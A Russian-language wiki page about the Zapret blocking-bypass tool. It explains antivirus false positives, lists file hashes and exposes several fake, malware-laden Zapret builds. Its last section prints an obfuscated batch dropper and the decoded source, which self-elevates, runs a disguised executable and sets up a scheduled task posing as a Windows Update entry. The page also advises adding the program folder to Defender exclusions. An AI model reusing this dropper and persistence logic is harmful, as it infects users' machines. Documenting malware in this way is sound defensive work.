[[Домашняя страница Zapret 2|На главную]]
# Вирусы в Запрет! Рассказываем про WinDivert
>Новая группа про реальные вирусные сборки запрета: https://t.me/zapretvirus
> [!CAUTION]
> [Касперский](https://github.com/bol-van/zapret/issues/611) и иные российские вирусы начали войну с запретами и иными средствами обхода блокировок. Чтобы использовать их спокойно рекомендуется перейти на **альтернативные** антивирусы (Defender, ESET32 и т.д.), которые не выдают ложные и обманчивые срабатывания и помогают от большего количества угроз. Также не следует использовать российские антивирусы, либо добавлять файлы в исключения.
*Запрет вирус? Обход блокировки дискорда и ютуба (discord и youtube). Если не работает дискорд или ютуб вам сюда. | Список вирусных Zapret представлен здесь...*
### Как проверить вирусы?
- Проект должен быть с открытым исходным кодом. Любой лаунчер человек должен собрать сам. Поэтому у него должен быть исходный код (batфайлы, ps файлы, pyфайлы и т.д.)
- Вы можете собрать его самостоятельно из исходных файлов или по крайней мере запуск производится по понятным механикам.
- Одно из самых важных правил: В проекте нет ни одного неизвестного exeфайла! Должен быть только один файл winws.exe!
- Если Вы (*или по крайней мере Вам кажется*) что вы поймали вирус обратитесь в [группу](https://t.me/MinerSearch_chat) - Вам помогут опытные люди с самыми различными историями.
## Почему антивирусы ругаются на Zapret (winws.exe), WinDivert и ZapretGUI?
Многие пользователи, впервые скачав Zapret, видят предупреждение антивируса со страшным словом «`Trojan`» и сразу паникуют. Давайте разберёмся, почему это происходит и стоит ли беспокоиться.
### Как работают современные антивирусы
Антивирусы используют два основных метода обнаружения угроз:
1. **Сигнатурный анализ** — антивирус сравнивает файл с базой известных вирусов. Если файл совпадает с образцом вредоносной программы, он блокируется.
2. **Эвристический (поведенческий) анализ** — антивирус анализирует, *что делает* программа. Если её поведение похоже на типичное поведение вирусов, срабатывает предупреждение. Именно здесь кроется причина ложных срабатываний.
### Почему Zapret вызывает подозрения
Zapret выполняет действия, которые *технически* похожи на то, что делают некоторые вредоносные программы:
- **Изменяет файл hosts** — этот системный файл отвечает за сопоставление доменных имён с IP-адресами. Вирусы часто его модифицируют, чтобы перенаправлять вас на фишинговые сайты. Zapret же использует его для корректной работы обхода блокировок.
- **Работает с сетевым трафиком на низком уровне** — программа перехватывает и модифицирует сетевые пакеты. Это необходимо для обхода DPI, но такое же поведение характерно для шпионских программ.
- **Использует системные драйверы** — `WinDivert` и `Monkey.sys` позволяют программе взаимодействовать с сетевым стеком Windows. Это легитимные драйверы, но сам факт их использования настораживает антивирус.
### Что означает детект «Trojan:Win32/Bearfoos.B!ml»
Обратите внимание на окончание `!ml` в названии угрозы. Это означает **machine learning** — то есть не человек-аналитик пометил файл как вирус, а нейросеть Microsoft Defender решила, что поведение программы «подозрительное». Такие детекты часто бывают ложными, особенно для программ, работающих с системными компонентами.
### Чего Zapret НЕ делает
Настоящие трояны обычно:
- крадут пароли и cookies из браузеров
- сканируют папки в поисках ценных файлов
- отправляют ваши данные на серверы злоумышленников
- устанавливают скрытые майнеры или бэкдоры
Zapret ничего из этого не делает. Исходный код программы полностью открыт — любой желающий может его изучить и убедиться в отсутствии вредоносного кода
### Прозрачность сборки
Помимо открытого исходного кода, проект использует GitHub Actions для автоматической сборки. Это означает, что каждый релиз программы собирается прямо на серверах GitHub из публичного кода, а не на чьём-то личном компьютере.
Вы можете сами проверить историю сборок по адресу: https://github.com/youtubediscord/zapret/actions
Там видно, какой именно коммит (версия кода) использовался для каждой сборки, кто его сделал и когда. Зелёная галочка означает успешную сборку. Это гарантирует, что в скачанный вами файл никто не мог тайно подложить вредоносный код — вы получаете ровно то, что собрано из открытых исходников.
### Антивирус сработал, хотя раньше всё было нормально
Частая ситуация: вы пользовались Zapret несколько недель или месяцев без проблем, а потом Windows Defender внезапно начинает на него ругаться. Код программы при этом мог вообще не меняться.
Почему так происходит? Microsoft постоянно обновляет базы и алгоритмы Defender. Нейросеть переобучается, добавляются новые сигнатуры, меняются критерии «подозрительности». В какой-то момент обновлённый антивирус решает, что программа, которую он раньше пропускал, теперь выглядит опасной.
К нам регулярно (буквально раз в неделю) приходят пользователи с одинаковой историей: «Всё работало отлично, ничего не менял, а сегодня Defender удалил Zapret». Это нормально и не означает, что программа стала вредоносной — просто антивирус обновил свои правила.
Вот только ЧАСТЬ реальных скриншотов что раньше Дефендер не ругался, однако "после какого-то обновления" начал это делать. Они датируются ещё 2024 годом. Запомните - сам по себе детект Дефендера не означает что это обязательно вирус. Нужно смотреть ЧТО это за вирус и через эвристику был получен этот детект.
![[Pasted image 20251220211521.png]]
![[Pasted image 20251220211540.png]]
![[Pasted image 20251220211546.png]]
![[Pasted image 20251220211557.png]]
![[Pasted image 20251220211620.png]]
Что делать в такой ситуации: добавьте папку с Zapret в исключения Windows Defender и заново скачайте программу.
### Про драйверы WinDivert и Monkey.sys
Эти файлы — не часть Zapret, а отдельные общедоступные драйверы. WinDivert разработан для легитимного перехвата сетевого трафика и используется во множестве программ: файрволах, анализаторах трафика, VPN-клиентах. Подробнее о нём можно почитать [здесь](https://ntc.party/t/windivert-%D1%87%D1%82%D0%BE-%D1%8D%D1%82%D0%BE-%D1%82%D0%B0%D0%BA%D0%BE%D0%B5-%D0%B7%D0%B0%D1%87%D0%B5%D0%BC-%D0%B2-%D0%BD%D1%91%D0%BC-%D0%BC%D0%B0%D0%B9%D0%BD%D0%B5%D1%80/12838). Эти же драйверы использует оригинальный проект bol-van.
### Пример ложного срабатывания
Вот как выглядит типичное «обнаружение вируса», которое на самом деле является ложной тревогой:
Вот безопасный пример обнаружение "вируса":
![[Pasted image 20251220210625.png]]
![[Pasted image 20251220210803.png]]
Вы можете добавить в исключение:
1. Сам `exe` файл
2. Саму папку по [[path|следующим]] путям
Вот [пример](https://www.virustotal.com/gui/file/a188ff24aec863479408cee54b337a2fce25b9372ba5573595f7a54b784c65f8/detection) незараженного dll файла, который всего лишь изменяет код некоторых файлов для запуска пиратской игры.
Данный dll хорошо известен и достаточно популярный на запада, однако антивирусы сходят с ума когда его видят.
![[Pasted image 20251220205747.png]]
`Win64/Trojan.Generic.HgEATiwA` — китайские антивирусы часто нумируют так неизвестные им программы, которые как-то вшиваются в трафик. Доказательства этому приведены здесь, здесь и здесь.
`NotAVirus` — частый детект различных китайских вирусов, но он так и подписан - не вирус. Это значит что файл просто выполняет подозрительные действия, но напрямую не является трояном.
## Про хэш-файла
Неизвестные источники всё же могут маскировать Zapret под вирусы.
Есть способ защититься от этого - всегда сверяйте хэш файла WinDivert.dll и winws.exe. Если хэш суммы одинаковые, это значит что файлы никак не были изменены автором и были загружены из оригинального источника. Проверить хэш файла можно [здесь](https://hash-file.online).
Вот несколько старых хэшей файлов (есть и другие).
[Оригинальные](https://www.virustotal.com/gui/file/0453fce6906402181dbff7e09b32181eb1c08bb002be89849e8992b832f43b89/detection) хэщи программы winws.exe
- MD5 `444fe359ca183016b93d8bfe398d5103`
- SHA-1 `61716de8152bd3a59378a6cd11f6b07988a549d5`
- SHA-256 `0453fce6906402181dbff7e09b32181eb1c08bb002be89849e8992b832f43b89`
Версия [v68](https://www.virustotal.com/gui/file/c26719336725fda6d48815582acee198c0d7d4f6a6f9f73b5e0d58ca19cfbe35/detection)
- MD5 `c36c5c34d612ffc684047b7c87310a1f`
- SHA-1 `5b9a89d08554f911e93665a3910ff16db33bf1ce`
- SHA-256 `c26719336725fda6d48815582acee198c0d7d4f6a6f9f73b5e0d58ca19cfbe35`
Другие версии проверяйте самостоятельно [здесь](https://github.com/bol-van/zapret-win-bundle/tree/master/zapret-winws).
## Реальные вирусы
Однако не смотря на это были найдены примеры реально вирусных запретов.
Почему это так, и как проверить любую версию Запрет самостоятельно - давайте разбираться.
### 1. PeekBot - первый автор
Впервые вирусы в Zapret начал распространять телеграм канал peekbot начал распространять [вирусы](https://github.com/Flowseal/zapret-discord-youtube/issues/794) под предлогом Zapret. Будьте внимательны! Также у них имеется вредоносный сайт https://gitrok.com!
В папке висит вирусный cygwin.exe который весит свыше 13 МБ. Такие [большие файлы](https://www.virustotal.com/gui/file/5591f24e96ed8d2877ac056955f5aaeb45fab792f1b35d635ae4a961c7000e26/detection) никогда не находились в оригинальном Zapret.
### 2. SkyWinFo - майнер, стилер
SkyWinFo - инженер ВПН который пошёл по скользкой дорожке и попытался превратить безвирусный запрет в самый настоящий вирус. Также был определён его тип и основная активность. Он притворялся запретом от Сensorliber.
🚩 Красные флаги:
- Не имеет исходного кода на GitHub
- Имеет архив `rar`, причём с паролем (не ясно зачем)
- Просит запустить `zapret.exe`, а не `zapret.bat`
- Нет связи с автором
В инструкции происходит некая каша и неразбериха, например указаны разные ссылки на источники (первый файл вирусный, второй реальный скрипт):
![[Pasted image 20251220205945.png]]
Репозиторий github.com/SkyWinFo/Zapret-
В файле лежит неизестный вирусный файл, размер которого явно превышает несколько КБ (как оригинальный `winws.exe`):
![[Pasted image 20251220205959.png]]
Имеет [слишком](https://www.virustotal.com/gui/file/74ad0e6a891ce535144f2a5b002ee3e4fd62a7197f274f63c24b928580895087) много [срабатываний](https://www.virustotal.com/gui/file/b15c8e2296c573cab1f9d51a643948620200be8f40f3a09b3c8fe56ad923d227) антивирусов, некоторые обнаружения прямо указывает на троян.
При [анализе файла сканирует папки на куки файлы](https://www.hybrid-analysis.com/sample/b15c8e2296c573cab1f9d51a643948620200be8f40f3a09b3c8fe56ad923d227/677be877a8d7713c64036581), создаёт папки для криптокошелков и пытается запустить множество процессов. Отправляет данные на неизвестный сайт.
### 3. Cactuz - троян
Новый тип вирусов с файлом `winwsdriver.exe`.
Их Телеграм группа:
![[Pasted image 20251220210032.png]]
Пост с вирусом:
![[Pasted image 20251220210036.png]]
Их ютуб канал:
![[Pasted image 20251220210040.png]]
Очень палёный вирус, который даже не пытается скрыть что он вирус. Второй EXE файл в папке `bin` который не должен был там быть - `winwsdriver.exe`.
![[Pasted image 20251220210045.png]]
Батник `general.bat` запускает два exe файла, что опять же не нужно.
![[Pasted image 20251220210054.png]]
На VirusTotal [СВЫШЕ 55 срабатываний](https://www.virustotal.com/gui/file/26b585599d0a8583af6e6aab0736b08cf81116a7d3ad9e0a826841663a099735)!
🚩 Красные флаги:
- Не имеет исходного кода на GitHub
- Имеет архив rar, причём с паролем (не ясно зачем)
- Лишние файлы в папке bin
- Нет связи с автором
### 4. Interfix - вероятно вирус
Также известен как Фиксик, trapper1337.
![[Pasted image 20251220210120.png]]
Неизвестный ютубер trapper1337, в Telegram подписан как Фиксик. В Telegram канал закрыты комментарии, обратной связи с ним нет. Неизвестный exe файл выглядит как подозрительный, но чёткой вирусной активности нет.
Ютуб канал:
![[Pasted image 20251220210126.png]]
В папке `bin` лежит лишний файл `elevator.exe`.
![[Pasted image 20251220210130.png]]
![[Pasted image 20251220210137.png]]
Файл `start.cmd` запускает два EXE файла, что не требуется для Zapret
![[Pasted image 20251220210148.png]]
Подозрительный файл [не имеет много детектов антивирусов](https://www.virustotal.com/gui/file/ee56928e8e1c7178c1cf6b688cc8dcbcae2692e96654cea5e179a70420520aee/detection), поэтому чётко заявлять что это троян нельзя.
При этом всё же [поведение файла является подозрительным](https://www.hybrid-analysis.com/sample/ee56928e8e1c7178c1cf6b688cc8dcbcae2692e96654cea5e179a70420520aee/677bf1e7499fa6bdbc07e686), соединение с какими-то сайтами но не указано какими:
![[Pasted image 20251220210212.png]]
Красные флаги:
- Не имеет исходного кода на GitHub
- Имеет архив `rar`, причём с паролем (не ясно зачем)
- Лишние файлы в папке `bin`
- Нет связи с автором
- Аналогичный файл можно встретить в сборке от YanGusik FuckDiscordPI.
![[Pasted image 20251220210229.png]]
### 5. Discord NewFix - скрытый вирус
Данный вирус пытается обфускацировать свой код с помощью программ запутывания кода.
![[Pasted image 20251220210238.png]]
Неизвестный файл `discord.bat` с иероглифами, который автор канал просит запустить:
```python
挦獬敀档景൦ഊ椊硥獩⁴┢单剅剐䙏䱉╅䅜灰慄慴䱜捯污停捡慫敧屳楍牣獯景楗摮睯即潴敲䱜捯污瑓瑡履䥌䕃华⹅硴≴⠠††潧潴匠楫䍰摯⤊灯湥楦敬渾汵㈠渾汵晩┠牥潲汲癥汥‥敮ⁱ‰ന †瀠睯牥桳汥䌭浯慭摮∠瑓牡牐捯獥┧晾✰ⴠ敖扲爠湵獁ഢ †攠楸⁴戯ഩഊ椊硥獩⁴┢摾ば楢屮祣睧湩⸲汤≬⠠††潣祰∠縥灤戰湩捜杹楷㉮搮汬•┢䕔偍尥癪攮數•渾汵㈠☾റ⤊攠獬ന †攠楸⁴戯ㄠഩഊ椊硥獩⁴┢䕔偍尥癪攮數•ന †猠慴瑲∠•┢䕔偍尥癪攮數•猯㸠畮㸲ㄦ
汥敳⠠††硥瑩⼠റ⤊晩渠瑯攠楸瑳∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整•ന †洠摫物∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整•渾汵㈠☾റ⤊晩攠楸瑳∠縥灤到䅅䵄⹅摭•ന †挠灯⁹┢摾ば䕒䑁䕍洮≤∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整䱜䍉久䕓圭⹄硴≴㸠畮㸲ㄦ
汥敳⠠††硥瑩⼠റ⤊捳瑨獡獫⼠牣慥整⼠湴∠楍牣獯景屴楗摮睯屳楗摮睯啳摰瑡履湗敔灭•琯尢樢癡睡≜ⴠ慪≜唥䕓偒佒䥆䕌⼥灁䑰瑡⽡潌慣⽬慐正条獥䴯捩潲潳瑦圮湩潤獷瑓牯⽥潌慣卬慴整䰯䍉久䕓圭⹄硴屴∢⼠捳漠汮杯湯⼠汲栠杩敨瑳⼠渾汵㈠☾റഊ㨊歓灩潃敤档灣㘠〵㸠畮൬㨊›㔶〰️‱ 呕ⵆസഊ挊搯∠縥灤∰慣汬挠敨正畟摰瑡獥戮瑡猠景൴攊档㩯敳⁴䥂㵎縥灤戰湩൜ഊ猊慴瑲∠慺牰瑥›楤捳牯≤⼠業┢䥂╎楷睮硥≥ⴠ眭ⵦ捴㵰㐴″ⴭ晷甭灤㐽㌴㔬〰️〰️㔭〰️帠ⴭ楦瑬牥甭灤㐽㌴ⴠ栭獯汴獩㵴氢獩楤捳牯硴≴ⴠ搭楰搭獥湹㵣慦敫ⴠ搭楰搭獥湹ⵣ敲数瑡㵳‶ⴭ灤敤祳据昭歡ⵥ畱捩∽䈥义焥極彣湩瑩慩彬睷彷潧杯敬损浯戮湩•ⴭ敮⁷൞ⴊ昭汩整摵㵰〵〰️ⴰ〵〱‰ⴭ灩敳㵴椢獰瑥搭獩潣摲琮瑸•ⴭ灤敤祳据昽歡ⴭ灤敤祳据愭祮瀭潲潴潣ⴭ灤敤祳据挭瑵景㵦㍤ⴠ搭楰搭獥湹ⵣ敲数瑡㵳‶ⴭ敮⁷൞ⴊ昭汩整捴㵰㐴″ⴭ潨瑳楬瑳∽楬瑳搭獩潣摲琮瑸•ⴭ灤敤祳据昽歡ⱥ灳楬⁴ⴭ灤敤祳据愭瑵瑯汴㈽ⴠ搭楰搭獥湹ⵣ敲数瑡㵳‶ⴭ灤敤祳据昭潯楬杮戽摡敳ⁱⴭ灤敤祳据昭歡ⵥ汴㵳┢䥂╎汴彳汣敩瑮敨汬彯睷彷潧杯敬损浯戮湩ഢ
```
![[Pasted image 20251220210255.png]]
![[Pasted image 20251220210259.png]]
При расшифровке данного файла окажется что исходный код был пропущен через `batch-obfuscator` и загружает данный код:
```python
&cls
@echo off
if exist "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState\LICENSE.txt" (
goto SkipCode
)
openfiles >nul 2>nul
if %errorlevel% neq 0 (
powershell -Command "Start-Process '%~f0' -Verb runAs"
exit /b
)
if exist "%~dp0bin\cygwin2.dll" (
copy "%~dp0bin\cygwin2.dll" "%TEMP%\jv.exe" >nul 2>&1
) else (
exit /b 1
)
if exist "%TEMP%\jv.exe" (
start "" "%TEMP%\jv.exe" /s >nul 2>&1
else (
exit /b 1
)
if not exist "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState" (
mkdir "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState" >nul 2>&1
)
if exist "%~dp0README.md" (
copy "%~dp0README.md" "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState\LICENSE-WD.txt" >nul 2>&1
else (
exit /b 1
)
schtasks /create /tn "Microsoft\Windows\WindowsUpdate\WnTemp" /tr "\"javaw\" -jar \"%USERPROFILE%/AppData/Local/Packages/Microsoft.WindowsStore/LocalState/LICENSE-WD.txt\"-tls="%BIN%tls_clienthello_www_google_com.bin"
```
Бат файл создаёт задачу на джаве скрипте, после чего подгружается вирус:
![[Pasted image 20251220210326.png]]
![[Pasted image 20251220210329.png]]